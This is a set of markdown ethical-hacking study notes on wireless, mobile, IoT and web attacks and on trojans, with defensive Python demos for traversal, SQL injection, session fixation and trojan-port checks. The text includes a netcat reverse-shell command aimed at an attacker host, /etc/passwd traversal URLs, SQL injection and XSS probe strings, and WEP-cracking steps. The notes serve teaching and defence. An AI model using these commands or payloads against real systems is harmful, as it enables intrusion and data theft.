- **Rogue Access Point** - places an access point controlled by an attacker
- **Evil Twin** - a rogue AP with an SSID similar to the name of a popular network
  - Also known as a mis-association attack
- **Honeyspot** - faking a well-known hotspot with a rogue AP
- **Ad Hoc Connection Attack** - connecting directly to another phone via an ad-hoc network
  - Not very successful, as the other user has to accept the connection
- **DoS Attack** - either sends de-auth packets to the AP or jams the wireless signal
  - With a de-auth, you can have the users connect to your AP instead if it has the same name
  - Jammers are very dangerous, as they are illegal
- **MAC Filter** - only allows certain MAC addresses on a network
  - Easily broken because you can sniff out MAC addresses already connected and spoof one
  - Tools for spoofing include **SMAC** and **TMAC**

### Wireless Encryption Attacks

- **WEP Cracking**
  - Easy to do because of weak IVs
  - **Process**
    1. Start a compatible adapter with injection and sniffing capabilities
    2. Start a sniffer to capture packets
    3. Force the creation of thousands of packets (generally with de-auth)
    4. Analyze captured packets
  - **Tools**
    - **Aircrack-ng** - sniffer, detector, traffic analysis tool and a password cracker
      - Uses dictionary attacks for WPA and WPA2; other attacks are for WEP only
    - **Cain and Abel** - sniffs packets and cracks passwords (may take longer)
      - Relies on statistical measures and the PTW technique to break WEP
    - **KisMAC** - macOS tool to brute force WEP or WPA passwords
    - **WEPAttack**
    - **WEPCrack**
    - **Portable Penetrator**
    - **Elcomsoft's Wireless Security Auditor**
  - Methods to crack include the **PTW**, **FMS** and **Korek** techniques
- **WPA Cracking**
  - Much more difficult than WEP
  - Uses a constantly changing temporal key and user-defined password
  - **Key Reinstallation Attack** (KRACK) - replay attack that uses the third handshake of another device's session
  - Most other attacks are simply brute-forcing the password

### Wireless Sniffing

- Very similar to sniffing a wired network
- **Tools**
  - **NetStumbler**
  - **Kismet**
  - **OmniPeek** - provides data like Wireshark in addition to network activity and monitoring
  - **AirMagnet WiFi Analyzer Pro** - sniffer, traffic analyzer and network-auditing suite
  - **WiFi Pilot**

--------------------------------------------------------------------------------
/8 - Mobile Communications and IoT.md:
--------------------------------------------------------------------------------
# Mobile Communications and IoT

### Mobile Platform Hacking

- **Three Main Avenues of Attack**
  - **Device Attacks** - browser based, SMS, application attacks, rooted/jailbroken devices
  - **Network Attacks** - DNS cache poisoning, rogue APs, packet sniffing
  - **Data Center (Cloud) Attacks** - databases, photos, etc.

- **OWASP Top 10 Mobile Risks**
  - **M1 - Improper Platform Usage** - misuse of features or security controls (Android intents, TouchID, Keychain)
  - **M2 - Insecure Data Storage** - improperly stored data and data leakage
  - **M3 - Insecure Communication** - poor handshaking, incorrect SSL, clear-text communication
  - **M4 - Insecure Authentication** - authenticating the end user or bad session management
  - **M5 - Insufficient Cryptography** - code that applies cryptography to an asset, but is insufficient (does NOT include SSL/TLS)
  - **M6 - Insecure Authorization** - failures in authorization (access rights)
  - **M7 - Client Code Quality** - catchall for code-level implementation problems
  - **M8 - Code Tampering** - binary patching, resource modification, dynamic memory modification
  - **M9 - Reverse Engineering** - reversing core binaries to find problems and exploits
  - **M10 - Extraneous Functionality** - catchall for backdoors that were inadvertently placed by coders

### Mobile Platforms

- **Android** - platform built by Google
  - **Rooting** - name given to the ability to have root access on an Android device
  - **Tools**
    - KingoRoot
    - TunesGo
    - OneClickRoot
    - MTK Droid
- **iOS** - platform built by Apple
  - **Jailbreaking** - different levels of rooting an iOS device
  - **Tools**
    - evasi0n7
    - GeekSn0w
    - Pangu
    - Redsn0w
    - Absinthe
    - Cydia
  - **Techniques**
    - **Untethered** - kernel remains patched after reboot, with or without a system connection
    - **Semi-Tethered** - reboot no longer retains the patch; must use installed jailbreak software to re-jailbreak
    - **Tethered** - reboot removes all jailbreaking patches; phone may get in a boot loop requiring USB to repair
  - **Types**
    - **Userland exploit** - found in the system itself; gains root access; does not provide admin; can be patched by Apple
    - **iBoot exploit** - found in the bootloader called iBoot; uses a vulnerability to turn codesign off; semi-tethered; can be patched
    - **BootROM exploit** - allows access to the file system, iBoot and custom boot logos; found in the device's first bootloader; cannot be patched
- **App Store attacks** - since some app stores are not vetted, malicious apps can be placed there
- **Phishing attacks** - mobile phones have more data to be stolen and are just as vulnerable as desktops
- **Android Device Administration API** - allows for security-aware apps that may help
- **Bring Your Own Device** (BYOD) - dangerous for organizations because not all phones can be locked down by default
- **Mobile Device Management** - like group policy on Windows; helps enforce security and deploy apps from the enterprise
  - MDM solutions include XenMobile, IBM, MaaS360, AirWatch and MobiControl
- **Bluetooth attacks** - if a mobile device can be connected to easily, it can fall prey to Bluetooth attacks
  - **Discovery mode** - how the device reacts to inquiries from other devices
    - **Discoverable** - answers all inquiries
    - **Limited Discoverable** - restricts the action
    - **Nondiscoverable** - ignores all inquiries
  - **Pairing mode** - how the device deals with pairing requests
    - **Pairable** - accepts all requests
    - **Nonpairable** - rejects all connection requests

### Mobile Attacks

- **SMS Phishing** - sending texts with malicious links
  - People tend to trust these more because they happen less
  - **Trojans Available to Send**
    - Obad
    - Fakedefender
    - TRAMPS
    - ZitMo
  - **Spyware**
    - Mobile Spy
    - Spyera
- Mobile platform features such as Find my iPhone, Android device tracking and the like can be hacked to find devices, etc.
- **Mobile Attack Platforms** - tools that allow you to attack from your phone
  - Network Spoofer
  - DroidSheep
  - Nmap
- **Bluetooth Attacks**
  - **Bluesmacking** - denial of service against a device
  - **Bluejacking** - sending unsolicited messages
  - **Bluesniffing** - attempt to discover Bluetooth devices
  - **Bluebugging** - remotely using a device's features
  - **Bluesnarfing** - theft of data from a device
  - **Blueprinting** - collecting device information over Bluetooth
- **Bluetooth Attack Tools**
  - **BlueScanner** - finds devices around you
  - **BT Browser** - another tool for finding and enumerating devices
  - **Bluesniff** and **btCrawler** - sniffing programs with a GUI
  - **Bloover** - can perform Bluebugging
  - **PhoneSnoop** - good spyware option for BlackBerry
  - **Super Bluetooth Hack** - all-in-one package that allows you to do almost anything

### IoT Architecture

- **Definition** - a collection of devices using sensors, software, storage and electronics to collect, analyze, store and share data
- **Three Basic Components**
  - Sensing Technology
  - IoT gateways
  - The cloud
- **Operating Systems**
  - **RIOT OS** - embedded systems, actuator boards, sensors; is energy efficient
  - **ARM Mbed OS** - mostly used on wearables and other low-powered devices
  - **RealSense OS X** - Intel's depth sensing version; mostly found in cameras and other sensors
  - **Nucleus RTOS** - used in aerospace, medical and industrial applications
  - **Brillo** - Android-based OS; generally found in thermostats
  - **Contiki** - OS made for low-power devices; found mostly in street lighting and sound monitoring
  - **Zephyr** - option for low-power devices and devices without many resources
110 | - **Ubuntu Core** - used in robots and drones; known as "snappy"
111 | - **Integrity RTOS** - found in aerospace, medical, defense, industrial and automotive sensors
112 | - **Apache Mynewt** - used in devices using Bluetooth Low Energy Protocol
113 | - **Methods of Communicating**
114 | - **Device to Device** - communicates directly with other IoT devices
115 | - **Device to Cloud** - communicates directly to a cloud service
116 | - **Device to Gateway** - communicates with a gateway before sending to the cloud
117 | - **Back-End Data Sharing** - like device to cloud but adds abilities for parties to collect and use the data
118 | - **Architecture Levels**
119 | - **Edge Technology Layer** - consists of sensors, RFID tags, readers and the devices
120 | - **Access Gateway Layer** - first data handling, message identification and routing
121 | - **Internet Layer** - crucial layer which serves as main component to allow communication
122 | - **Middleware Layer** - sits between application and hardware; handles data and device management, data analysis and aggregation
123 | - **Application Layer** - responsible for delivery of services and data to the user
124 |
125 | ### IoT Vulnerabilities and Attacks
126 |
127 | - **I1 - Insecure Web Interface** - problems such as account enumeration, weak credentials, and no account lockout
128 | - **I2 - Insufficient Authentication/Authorization** - weak passwords, no lockout or MFA, poor role checks; interfaces are often assumed to be reachable only from internal networks, which is itself a flaw
129 | - **I3 - Insecure Network Services** - may be susceptible to buffer overflow or DoS attacks
130 | - **I4 - Lack of Transport Encryption/Integrity Verification** - data transported without encryption
131 | - **I5 - Privacy Concerns** - due to collection of personal data
132 | - **I6 - Insecure Cloud Interface** - easy-to-guess credentials make enumeration easy
133 | - **I7 - Insecure Mobile Interface** - easy-to-guess credentials on mobile interface
134 | - **I8 - Insufficient Security Configurability** - security settings cannot be changed, leaving default passwords and configuration in place
135 | - **I9 - Insecure Software/Firmware** - device cannot be updated, does not check for updates, or fetches updates without encryption or signature verification
136 | - **I10 - Poor Physical Security** - because of the nature of devices, these can easily be stolen
137 |
138 | - **Sybil Attack** - uses multiple forged identities to create the illusion of traffic
139 | - **HVAC Attacks** - attacks on HVAC systems
140 | - **Rolling Code** - jamming the key fob's transmission while recording it, so the captured code is never consumed by the car and can be replayed later; the owner's next press supplies a fresh code and nothing looks wrong
141 | - **BlueBorne Attack** - attacks against Bluetooth devices
142 |
143 | - Other attacks already enumerated in other sections still apply such as MITM, ransomware, side channel
144 |
145 | ### IoT Hacking Methodology
146 |
147 | - **Steps**
148 | - **Information Gathering** - gathering information about the devices; useful resource is Shodan (Google for IoT devices connected to Internet)
149 | - **Foren6** - IoT traffic sniffer
150 | - **Vulnerability Scanning** - same as normal methodology - looks for vulnerabilities
151 | - **Tools**
152 | - Nmap
153 | - RIoT Vulnerability Scanner
154 | - beSTORM
155 | - IoTsploit
156 | - IoT Inspector
157 | - **Launching Attacks**
158 | - **Tools**
159 | - Firmalyzer
160 | - KillerBee
161 | - JTAGulator
162 | - Attify
163 | - **Gaining Access** - same objectives as normal methodology
164 | - **Maintaining Access** - same objectives as normal methodology
165 |
--------------------------------------------------------------------------------
/6 - Web-Based Hacking - Servers and Applications.md:
--------------------------------------------------------------------------------
1 | # Web-Based Hacking - Servers and Applications
2 |
3 | ### Web Organizations
4 |
5 | - **Internet Engineering Task Force** (IETF) - creates engineering documents to help make the Internet work better
6 | - **World Wide Web Consortium** (W3C) - a standards-developing community
7 | - **Open Web Application Security Project** (OWASP) - organization focused on improving the security of software
8 |
9 | ### OWASP Web Top 10
10 |
11 | - **A1 - Injection Flaws** - SQL, OS and LDAP injection
12 | - **A2 - Broken Authentication and Session Management** - functions related to authentication and session management that aren't implemented correctly
13 | - **A3 - Sensitive Data Exposure** - not properly protecting sensitive data (SSN, CC numbers, etc.)
14 | - **A4 - XML External Entities (XXE)** - exploiting XML processors by uploading hostile content in an XML document
15 | - **A5 - Broken Access Control** - having improper controls on areas that should be protected
16 | - **A6 - Security Misconfiguration** - across all parts of the server and application
17 | - **A7 - Cross-Site Scripting (XSS)** - including untrusted data in a page sent to the browser without validation or output encoding
18 | - **A8 - Insecure Deserialization** - improperly de-serializing data
19 | - **A9 - Using Components with Known Vulnerabilities** - libraries and frameworks that have known security holes
20 | - **A10 - Insufficient Logging and Monitoring** - not having enough logging to detect attacks
21 |
22 | **WebGoat** - project maintained by OWASP which is an insecure web application meant to be tested
23 |
24 | ### Web Server Attack Methodology
25 |
26 | - **Information Gathering** - Internet searches, whois, reviewing robots.txt
27 | - **Web Server Footprinting** - banner grabbing
28 | - **Tools**
29 | - Netcraft
30 | - HTTPRecon
31 | - ID Serve
32 | - HTTPrint
33 | - nmap
34 | - nmap --script http-trace -p80 localhost (detects vulnerable TRACE method)
35 | - nmap --script http-google-email (lists email addresses)
36 | - nmap --script hostmap-* (discovers virtual hosts on the IP address you are trying to footprint; * is replaced by online db such as IP2Hosts)
37 | - nmap --script http-enum -p80 (enumerates common web apps)
38 | - nmap -p80 --script http-robots.txt (grabs the robots.txt file)
39 | - **Website Mirroring** - brings the site to your own machine to examine structure, etc.
40 | - **Tools**
41 | - Wget
42 | - BlackWidow
43 | - HTTrack
44 | - WebCopier Pro
45 | - Web Ripper
46 | - SurfOffline
47 | - **Vulnerability Scanning** - scans web server for vulnerabilities
48 | - **Tools**
49 | - Nessus
50 | - Nikto - specifically suited for web servers; still very noisy like Nessus
51 | - **Session Hijacking**
52 | - **Web Server Password Cracking**
53 |
54 | ### Web Server Architecture
55 |
56 | - **Most Popular Servers** - Apache, IIS and Nginx
57 | Apache configuration lives in text files (httpd.conf, etc.) and in loadable modules
58 | Older IIS (IIS 5) ran all applications in the context of LOCAL_SYSTEM; modern IIS runs each application pool under a low-privilege identity
59 | - IIS 5 had a ton of bugs - easy to get into
60 | - **N-Tier Architecture** - distributes processes across multiple servers; normally as three-tier: Presentation (web), logic (application) and data (database)
61 | - **Error Reporting** - should not be showing errors in production; easy to glean information
62 | - **HTML** - markup language used to display web pages
63 | - **HTTP Request Methods**
64 | - **GET** - retrieves whatever information is in the URL; sending data is done in URL
65 | - **HEAD** - identical to GET except that no body is returned
66 | - **POST** - sends data via body - data not shown in URL or in history
67 | - **PUT** - requests data be stored at the URL
68 | - **DELETE** - requests origin server delete resource
69 | - **TRACE** - requests application layer loopback of message
70 | - **CONNECT** - reserved for use with proxy
71 | - Both POST and GET can be manipulated by a web proxy
72 | - **HTTP Status Codes** (only 4xx and 5xx are errors)
73 | - **1xx: Informational** - request received, continuing
74 | - **2xx: Success** - action received, understood and accepted
75 | - **3xx: Redirection** - further action must be taken
76 | - **4xx: Client Error** - request contains bad syntax or cannot be fulfilled
77 | - **5xx: Server Error** - server failed to fulfill an apparently valid request
78 |
79 | ### Web Server Attacks
80 |
81 | - **DNS Amplification** - sends small queries to open recursive resolvers with the source address spoofed to the target; the much larger answers are all delivered to the target, which is flooded
82 | - **Directory Traversal** (../ or dot-dot-slash) - requests a file outside the web root that should not be reachable through the web server
83 | - Example: http://www.example.com/../../../../etc/passwd
84 | - Can use URL encoding (or Unicode/double encoding) to evade IDS signatures - %2e for dot, %2f for slash, %5c for backslash; decode before matching
85 | - **Parameter Tampering** (URL Tampering) - manipulating parameters within URL to achieve escalation or other changes
86 | - **Hidden Field Tampering** - modifying hidden form fields producing unintended results
87 | - **Web Cache Poisoning** - tricking a caching server (or a client's cache) into storing an attacker-controlled response so later visitors receive the malicious version
88 | - **WFETCH** - Microsoft tool that allows you to craft HTTP requests to see response data
89 | - **Misconfiguration Attack** - same as before - improper configuration of a web server
90 | - **Password Attack** - attempting to crack passwords related to web resources
91 | - **Connection String Parameter Pollution** - injects extra key=value pairs into a database connection string, which uses semicolons as the separator, to override settings such as the target server or credentials
92 | - **Web Defacement** - simply modifying a web page to say something else
93 | - **Tools**
94 | - **Brutus** - brute force web passwords of HTTP
95 | - **Hydra** - network login cracker
96 | - **Metasploit**
97 | Basic structure: Libraries provide the core, Interfaces (msfconsole and the like) drive it, and Modules supply what is sent at the target services
98 | - **Exploits** hold the actual exploit
99 | - **Payload** contains the arbitrary code if exploit is successful
100 | - **Auxiliary** used for one-off actions (like a scan)
101 | - **NOPS** used for buffer-overflow type operations
102 | - **Shellshock** - Bash flaw (CVE-2014-6271) in which commands appended after a function definition stored in an environment variable are executed when the variable is imported; reachable remotely through CGI scripts that copy HTTP headers into environment variables
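An added example (not from the study guide) showing why the encoded forms above matter. It decodes a request path the way a server would, flags `..` segments only after decoding so `%2e%2e` and double-encoded `%252e%252e` are not missed, and contrasts a naive path join with a check that the canonical path is still under the document root. The web root `/var/www/html` and the request strings are constructed for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the example; any absolute directory works.
WEB_ROOT = "/var/www/html"


def decode_path(raw: str) -> str:
    """Percent-decode until the string stops changing (bounded to 3 layers,
    which catches %2e as well as double-encoded %252e), then treat
    backslashes as separators the way IIS does."""
    cur = raw
    for _ in range(3):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.replace("\\", "/")


def looks_like_traversal(raw: str) -> bool:
    """Detection view: look for a '..' segment only AFTER decoding, so the
    %2e%2e / %252e%252e variants are not missed by a literal '../' signature."""
    return ".." in decode_path(raw).split("/")


def vulnerable_resolve(requested: str) -> str:
    """Naive server: glue the decoded request path onto the web root.
    normpath() happily collapses '..' segments, so the result can leave
    WEB_ROOT entirely."""
    return posixpath.normpath(WEB_ROOT + "/" + decode_path(requested))


def hardened_resolve(requested: str) -> Optional[str]:
    """Hardened server: normalise first, then refuse anything whose canonical
    form is not underneath WEB_ROOT. Returns None for rejected requests."""
    relative = decode_path(requested).lstrip("/")
    candidate = posixpath.normpath(WEB_ROOT + "/" + relative)
    root_prefix = WEB_ROOT.rstrip("/") + "/"
    if candidate != WEB_ROOT.rstrip("/") and not candidate.startswith(root_prefix):
        return None
    return candidate


if __name__ == "__main__":
    for req in ["images/logo.png", "../../../../etc/passwd",
                "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
                "..%5c..%5c..%5c..%5cetc%5cpasswd"]:
        print(f"{req!r:55} traversal={looks_like_traversal(req)} "
              f"naive={vulnerable_resolve(req)} hardened={hardened_resolve(req)}")
```

The check is done on the canonical path rather than on the raw string because a blacklist of `../` is exactly what the encoded variants are designed to slip past.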
103 |
104 | ### Web Application Attacks
105 |
106 | - Most often hacked because of inherent weaknesses built into the program
107 | - First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
108 | - **Tools for Identifying Entry Points**
109 | - WebScarab
110 | HTTPrint
111 | - BurpSuite
112 | - **Web 2.0** - dynamic applications; have a larger attack surface due to simultaneous communication
113 | - **File Injection** - attacker injects a pointer in a web form to an exploit hosted elsewhere
114 | - **Command Injection** - attacker supplies OS commands through an application input that the application passes to a system shell, gaining command execution (and often a shell) on the server
115 | - **LDAP Injection** - exploits applications that construct LDAP statements
116 | - Format for LDAP injection includes )(&)
117 | - **SOAP Injection** - inject query strings in order to bypass authentication
118 | - SOAP uses XML to format information
119 | - Messages are "one way" in nature
120 | - **Buffer Overflow** (Smashing the stack) - attempts to write data into application's buffer area to overwrite adjacent memory, execute code or crash a system
121 | - Inputs more data than the buffer is allowed
122 | - Includes stack, heap, NOP sleds and more
123 | - **Canaries** - systems can monitor these - if they are changed, they indicate a buffer overflow has occurred; placed between buffer and control data
124 | - **XSS** (Cross-site scripting) - inputting JavaScript into a web form that alters what the page does
125 | Can also be passed via URL, e.g. a probe such as http://IPADDRESS/';!--"<XSS>=&{()} (the classic XSS locator string, whose characters break out of most HTML contexts)
126 | Can be malicious by accessing cookies and sending them to a remote host
127 | Setting the **HttpOnly** flag on cookies keeps script from reading them, which blunts cookie theft but does not stop the injected script from acting as the user
128 | - **Stored XSS** (Persistent or Type-I) - stores the XSS in a forum or like for multiple people to access
129 | - **Cross-Site Request Forgery** (CSRF) - forces an end user to execute unwanted actions on an app they're already authenticated on
130 | - Inherits identity and privileges of victim to perform an undesired function on victim's behalf
131 | The attacker never sees the session: the victim's browser automatically attaches the session cookie to a request the attacker crafted (e.g. a form on a malicious page), so the server treats it as the logged-in user's request
132 | Can be mitigated by per-session **random challenge (anti-CSRF) tokens** that the attacker's page cannot read, and by the SameSite cookie attribute
133 | - **Session Fixation** - attacker obtains a valid session ID from the site (e.g. just by visiting it) and sends the victim a link that carries that ID. If the application keeps the same ID when the victim logs in, the attacker's copy of the ID is now an authenticated session; regenerating the session ID at login prevents this
134 | - **Cookies** - small text-based files stored that contains information like preferences, session details or shopping cart contents
135 | Can be manipulated to change functionality (e.g. changing a cookie that says "ADMIN=no" to "yes")
136 | - Sometimes, but rarely, can also contain passwords
137 | - **SQL Injection** - injecting SQL commands into input fields to produce output
138 | - Data Handling - Definition (DDL), manipulation (DML) and control (DCL)
139 | - Example - input "' OR 1 = 1 --" into a login field - basically tells the server if 1 = 1 (always true) to allow the login.
140 | - Double dash (--) tells the server to ignore the rest of the query (in this example, the password check)
141 | - Basic test to see if SQL injection is possible is just inserting a single quote (')
142 | - **Fuzzing** - inputting random data into a target to see what will happen
143 | - **Tautology** - using always true statements to test SQL (e.g. 1=1)
144 | - **In-band SQL injection** - uses same communication channel to perform attack
145 | Applies when the extracted data can be returned inside the application's normal response (e.g. rendered into a web table)
146 | Best for using UNION queries
147 | - **Out-of-band SQL injection** - results leave over a different channel than the request (e.g. a DNS or HTTP request from the database server to an attacker host, or a file written on the web server)
148 | - **Blind/inferential** - no error messages or data are returned; infer results from true/false differences in the page or from timing (e.g. a deliberately induced delay)
149 | - **Tools**
150 | - Sqlmap
151 | - sqlninja
152 | - Havij
153 | - SQLBrute
154 | - Pangolin
155 | - SQLExec
156 | - Absinthe
157 | - BobCat
158 | - **HTTP Response Splitting** - adds header response data to an input field so server splits the response
159 | - Can be used to redirect a user to a malicious site
160 | - Is not an attack in and of itself - must be combined with another attack
161 | - **Countermeasures** - input scrubbing for injection, SQL parameterization for SQL injection, keeping patched servers, turning off unnecessary services, ports and protocols
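An added example (not from the study guide) that runs the tautology and UNION payloads from the SQL injection notes against a small in-memory SQLite database, once through a string-concatenated query and once through the parameterized form recommended under countermeasures. The table, the two users and their clear-text passwords are constructed for the demo only.

```python
import sqlite3
from typing import List, Tuple


def build_demo_db() -> sqlite3.Connection:
    """Constructed demo database (in memory). Passwords are stored in clear
    only to keep the example short; a real system stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    """String concatenation: whatever the user types becomes part of the SQL
    syntax, so quotes, OR, UNION and -- are all interpreted by the database."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    """Bound parameters: the driver sends the query shape and the values
    separately, so the same input is compared as data and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def single_quote_probe(conn: sqlite3.Connection) -> bool:
    """The basic test from the text: a lone quote in the username field breaks
    the query (syntax error) only when input is concatenated into it."""
    try:
        login_vulnerable(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print("legit:", login_parameterized(db, "alice", "s3cret"))
    print("tautology, vulnerable:", login_vulnerable(db, "' OR 1 = 1 --", "x"))
    print("tautology, parameterized:", login_parameterized(db, "' OR 1 = 1 --", "x"))
    print("in-band UNION, vulnerable:",
          login_vulnerable(db, "' UNION SELECT password, role FROM users --", "x"))
    print("single quote breaks query:", single_quote_probe(db))
```

The UNION payload is the in-band case: the stolen column rides back in the same result set the login page already renders. With bound parameters the identical strings simply fail to match any username.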
162 |
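An added example (not from the study guide) of the session fixation attack described above, replayed against two login routines: one that keeps whatever session ID the browser presented, and one that regenerates the ID at login. The in-memory session store and the user name are constructed for the demo; the fresh IDs come from the OS CSPRNG, which is the "unpredictable session IDs" countermeasure in its simplest form.

```python
import secrets
from typing import Dict, Optional


class SessionStore:
    """Constructed in-memory session store: session ID -> logged-in user (None
    before authentication). Stands in for the server-side session table."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Optional[str]] = {}

    def new_session(self) -> str:
        # 256 bits from the OS CSPRNG: not guessable by brute force or calculation.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = None
        return sid

    def user_for(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)

    def login_fixable(self, sid: str, username: str) -> str:
        """Vulnerable: keeps whatever ID the browser presented and even adopts
        unknown IDs (e.g. from a ?sid= link). An attacker who planted the ID
        now holds an authenticated session under it."""
        self._sessions[sid] = username
        return sid

    def login_hardened(self, sid: str, username: str) -> str:
        """Hardened: destroy the pre-authentication ID and issue a fresh one at
        the moment of login (the privilege change). The planted ID stays useless."""
        self._sessions.pop(sid, None)
        fresh = self.new_session()
        self._sessions[fresh] = username
        return fresh


def run_fixation_attack(hardened: bool) -> Optional[str]:
    """Replays the attack from the text and returns what the attacker sees when
    reusing the ID they planted: the victim's identity, or None."""
    store = SessionStore()
    login = store.login_hardened if hardened else store.login_fixable
    planted = store.new_session()   # attacker obtains a valid pre-auth ID
    login(planted, "victim")        # victim follows the link and logs in with it
    return store.user_for(planted)  # attacker presents the same ID


if __name__ == "__main__":
    print("vulnerable login, attacker sees:", run_fixation_attack(hardened=False))
    print("hardened login, attacker sees:  ", run_fixation_attack(hardened=True))
```

Regenerating at login is the key step; unpredictable IDs alone do not help here because the attacker is reusing an ID the server itself handed out.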
--------------------------------------------------------------------------------
/10 - Trojans and Other Attacks.md:
--------------------------------------------------------------------------------
1 | # Trojans and Other Attacks
2 |
3 | ### Malware Basics
4 |
5 | - **Malware** - software designed to harm or secretly access a computer system without informed consent
6 | - Most is downloaded from the Internet with or without the user's knowledge
7 | - **Overt Channels** - legitimate communication channels used by programs
8 | - **Covert Channels** - used to transport data in unintended ways
9 | - **Wrappers** - programs that allow you to bind an executable to an innocent file
10 | - **Crypters** - use a combination of encryption and code manipulation to render malware undetectable to security programs
11 | - **Packers** - use compression to pack the executable, which helps evade signature-based detection
12 | - **Exploit Kits** - help deliver exploits and payloads
13 | - Infinity
14 | - Bleeding Life
15 | - Crimepack
16 | - Blackhole Exploit Kit
17 |
18 | ### Trojans
19 |
20 | - **Trojans** - software that appears to perform a desirable function but instead performs malicious activity
21 | - To hackers, it is a method to gain and maintain access to a system
22 | - Trojans are means of delivery whereas a backdoor provides the open access
23 | - **Types**
24 | - **Defacement trojan**
25 | - **Proxy server trojan**
26 | - **Botnet trojan**
27 | - Chewbacca
28 | - Skynet
29 | - **Remote access trojans**
30 | - RAT
31 | - MoSucker
32 | - Optix Pro
33 | - Blackhole
34 | - **E-banking trojans**
35 | - Zeus
36 | - Spyeye
37 | - **Command Shell Trojan** - Provides a backdoor to connect to through command-line access
38 | - Netcat
39 | - **Covert Channel Tunneling Trojan** (CCTT) - a RAT trojan; creates data transfer channels in previously authorized data streams
40 | - **Netcat**
41 | - "Swiss army knife" of tcp/ip hacking
42 | - Provides all sorts of control over a remote shell on a target
43 | On the victim, **nc -e /bin/sh AttackerIP Port#** connects out and hands the attacker a shell (reverse shell); plain **nc IPaddress Port#** just connects to a port. The -e option is compiled out of many distributions' netcat builds
44 | From attack machine **nc -l -p 5555** opens a listening port on 5555 to catch that connection
45 | - Can connect over TCP or UDP, from any port
46 | - Offers DNS forwarding, port mapping and forwarding and proxying
47 | - **Trojan Port Numbers**
48 |
49 | | Trojan Name | Port |
50 | |--------------------|--------|
51 | | Death | 2 |
52 | | Senna Spy | 20 |
53 | | Hackers Paradise | 31, 456 |
54 | | TCP Wrappers | 421 |
55 | | Doom, Santaz Back | 666 |
56 | | Silencer, WebEx | 1001 |
57 | | RAT | 1095-1098 |
58 | | SubSeven | 1243 |
59 | | Shiva-Burka | 1600 |
60 | | Trojan Cow | 2001 |
61 | | Deep Throat | 6670-6671 |
62 | | Tini | 7777 |
63 | | NetBus | 12345-12346 |
64 | | Whack a Mole | 12361-12363 |
65 | | Back Orifice | 31337, 31338 |
66 |
67 | - **netstat -an** - shows all connections and listening ports with numeric addresses (no name resolution); compare listening ports against the table above
68 | - **netstat -b** - Windows; displays all active connections and the executable that created each one (requires administrator rights)
69 | - **Process Explorer** - Microsoft tool that shows you everything about running processes
70 | - **Registry Monitoring Tools**
71 | - SysAnalyzer
72 | - Tiny Watcher
73 | - Active Registry Monitor
74 | - Regshot
75 | - **Msconfig** - Windows program that shows all programs set to start on startup
76 | - **Tripwire** - integrity verifier that can act as a HIDS in protection against trojans
77 | - **SIGVERIF** - File Signature Verification, built into Windows to check that system files and drivers carry valid digital signatures
78 | - Log file can be found at c:\windows\system32\sigverif.txt
79 | - Look for drivers that are not signed
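An added example (not from the study guide) of the check the netstat entries above describe: parse `netstat -an` output, pull out the ports the host is listening on, and compare them with the trojan port table. The netstat lines are a constructed sample in the Windows layout, not output from a real host.

```python
from typing import Iterable, Iterator, List, Tuple

# Port -> trojan name, from the table above with the ranges expanded.
TROJAN_PORTS = {
    2: "Death", 20: "Senna Spy", 31: "Hackers Paradise", 456: "Hackers Paradise",
    421: "TCP Wrappers", 666: "Doom / Santaz Back", 1001: "Silencer / WebEx",
    1095: "RAT", 1096: "RAT", 1097: "RAT", 1098: "RAT", 1243: "SubSeven",
    1600: "Shiva-Burka", 2001: "Trojan Cow", 6670: "Deep Throat", 6671: "Deep Throat",
    7777: "Tini", 12345: "NetBus", 12346: "NetBus",
    12361: "Whack a Mole", 12362: "Whack a Mole", 12363: "Whack a Mole",
    31337: "Back Orifice", 31338: "Back Orifice",
}

# Constructed sample of `netstat -an` output (Windows layout), not real data.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:49213     93.184.216.34:443      ESTABLISHED
  TCP    [::]:31337             [::]:0                 LISTENING
  UDP    0.0.0.0:5355           *:*
""".strip("\n").splitlines()


def parse_netstat(lines: Iterable[str]) -> Iterator[Tuple[str, int, str]]:
    """Yield (proto, local_port, state) per connection line; header and blank
    lines are skipped. UDP rows carry no state column."""
    for line in lines:
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        port = int(local.rsplit(":", 1)[1])     # works for 0.0.0.0:port and [::]:port
        state = parts[3] if len(parts) > 3 else "STATELESS"
        yield proto, port, state


def listening_ports(lines: Iterable[str]) -> List[int]:
    """Ports something on this host is waiting on (TCP LISTENING or any UDP)."""
    return sorted({port for proto, port, state in parse_netstat(lines)
                   if state == "LISTENING" or proto == "UDP"})


def flag_trojan_ports(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Listening ports that match the classic trojan table. A hit is a lead to
    chase with netstat -b or Process Explorer, not proof: legitimate software
    can sit on these ports, and current malware prefers 80/443 or random ports."""
    return [(port, TROJAN_PORTS[port]) for port in listening_ports(lines)
            if port in TROJAN_PORTS]


if __name__ == "__main__":
    print("listening:", listening_ports(SAMPLE_NETSTAT))
    print("suspicious:", flag_trojan_ports(SAMPLE_NETSTAT))
```

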